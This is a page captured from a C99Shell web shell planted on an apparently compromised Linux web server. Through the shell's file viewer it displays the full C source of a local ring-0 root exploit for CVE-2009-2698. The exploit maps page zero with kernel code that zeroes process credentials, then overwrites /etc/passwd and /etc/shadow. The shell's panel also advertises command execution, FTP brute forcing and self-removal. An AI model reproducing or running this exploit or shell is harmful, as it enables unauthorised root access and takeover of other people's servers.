!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mms/mmsmelodije/   drwxr-xr-x
Free 3.95 GB of 27.03 GB (14.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mmS.c (2.64 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
    unsigned *addr=task;
    while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
        addr++;
    }
    addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
    addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
    return;
}
void exploit();
void kernel_code()
{
    asm("exploit:\n"
        "push %eax\n"
        "movl $0xfffff000,%eax\n"
        "andl %esp,%eax\n"
        "pushl (%eax)\n"
        "call get_root_uid\n"
        "addl $4,%esp\n"
        "popl %eax\n");
    return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
    int fd=0;
    char buf[1024];
    struct sockaddr x0x;
    void *zero_page;

    uid=getuid();
    gid=getgid();
    if(uid==0){
        fprintf(stderr,"[-] check ur uid\n");
        return -1;
    }
    if(personality(0xffffffff)==PER_SVR4){
        if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
            perror("[-] mprotect()");
            return -1;
        }
    }
    else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
            perror("[-] mmap()");
            return -1;
    }
    *(unsigned long *)0x0=0x90909090;
    *(char *)0x00000004=0x90; /* +1 */
    *(char *)0x00000005=0xff;
    *(char *)0x00000006=0x25;
    *(unsigned long *)0x00000007=(unsigned long)&kernel;
    *(char *)0x0000000b=0xc3;

    if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
        perror("[-] socket()");
        return -1;
    }
    x0x.sa_family=AF_UNSPEC;
    memset(x0x.sa_data,0x82,14);
    memset((char *)buf,0,sizeof(buf));
    sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
    sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
    if(getuid()==uid){
        printf("[-] exploit failed, try again\n");
        return -1;
    }
    close(fd);
    execl("/bin/bash","bash","-c","cat ./passwd > /etc/passwd; cat ./shadow > /etc/shadow",NULL);
    return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0039 ]--